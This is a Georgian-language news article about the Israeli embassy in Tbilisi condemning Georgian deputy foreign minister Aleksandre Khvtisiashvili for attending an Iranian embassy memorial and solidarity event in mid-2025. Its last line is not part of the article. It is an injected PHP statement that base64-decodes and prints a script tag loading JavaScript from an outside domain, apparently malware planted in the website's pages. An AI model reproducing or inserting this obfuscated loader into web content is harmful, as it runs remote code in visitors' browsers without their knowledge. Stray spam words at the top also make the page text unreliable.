gorgia
jaluzi

საქართველოს საგარეო საქმეთა მინისტრის მოადგილის ირანის საელჩოს სოლიდარობის ღონისძიებაში მონაწილეობის მიღება მორალურად არასწორია, - ამის შესახებ ნათქვამია საქართველოში ისრაელის საელჩოს განცხადებაში.

„შევშფოთდით, როდესაც გავიგეთ, რომ საქართველოს საგარეო საქმეთა მინისტრის მოადგილე თბილისში, ირანის საელჩოში სოლიდარობის ღონისძიებას დაესწრო.

მაშინ, როდესაც დასავლეთი ისრაელის მოქალაქეების წინააღმდეგ ირანის თავდასხმებს გმობს და მხარს უჭერს ძალისხმევებს მისი ბირთვული და გენოციდური ამბიციების შესაჩერებლად, ღრმად იმედგამაცრუებელია იმის დანახვა, რომ საგარეო საქმეთა მინისტრის მოადგილე მსგავს ღონისძიებაში იღებს მონაწილეობას. ეს მორალურად არასწორია“, - ნათქვამია განცხადებაში, რომელიც საელჩომ „ინტერპრესნიუსს“ გამოუგზავნა.

შეგახსენებთ, ირანის საელჩომ დღეს გაავრცელა ინფორმაცია, რომლის თანახმად, საქართველოს საგარეო საქმეთა მინისტრის მოადგილე ალექსანდრე ხვთისიაშვილმა, საელჩოში გახსნილ სამძიმრის წიგნში ჩანაწერი გააკეთა, ისრაელის თავდასხმის შედეგად დაღუპულთა მიმართ სამძიმარი გამოთქვა და ირანის მიმართ კი სოლიდარობა გამოხატა.

ირანის საელჩოს განმარტებით, აღნიშნულთან დაკავშირებით საელჩოში ღონისძიება გაიმართა.

„2025 წლის 30 ივნისს და 1-ელ ივლისს, ორშაბათსა და სამშაბათს, თბილისში, ირანის ისლამური რესპუბლიკის საელჩოში გაიმართა ღონისძიება, რომელიც ეძღვნებოდა ირანის ტერიტორიული მთლიანობის წინააღმდეგ ისრაელის რეჟიმის მიერ განხორციელებული შეიარაღებული თავდასხმის დროს დაღუპულ მოწამეთა ხსოვნას.

ღონისძიებას ესწრებოდნენ საქართველოს საგარეო საქმეთა მინისტრის მოადგილე ალექსანდრე ხვთისიაშვილი, აგრეთვე თბილისში აკრედიტებული დიპლომატიური კორპუსის წარმომადგენლები, მათ შორის თურქმენეთის, ყაზახეთის, სომხეთის და აზერბაიჯანის ელჩები, ერაყის საქმეთა რწმუნებული, ჩინეთის სამხედრო ატაშე, ასევე რელიგიური ჯგუფების წარმომადგენლები, მათ შორის საქართველოს მუსლიმთა სამმართველოს თავმჯდომარე, ირანული დიასპორის წევრები და ქართველი ირანისტები.

მათ საელჩოში გახსნილ სამძიმრის წიგნში გააკეთეს ჩანაწერები, გამოთქვეს თავიანთი სამძიმარი და სოლიდარობა ირანის მიმართ.

დიდ მადლიერებას ვუცხადებთ ჩვენს მეგობრებსა და პარტნიორებს ამ რთულ პერიოდში გამოჩენილი მხარდაჭერისა და თანაგრძნობისთვის“,- ნათქვამია ინფორმაციაში.

166
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");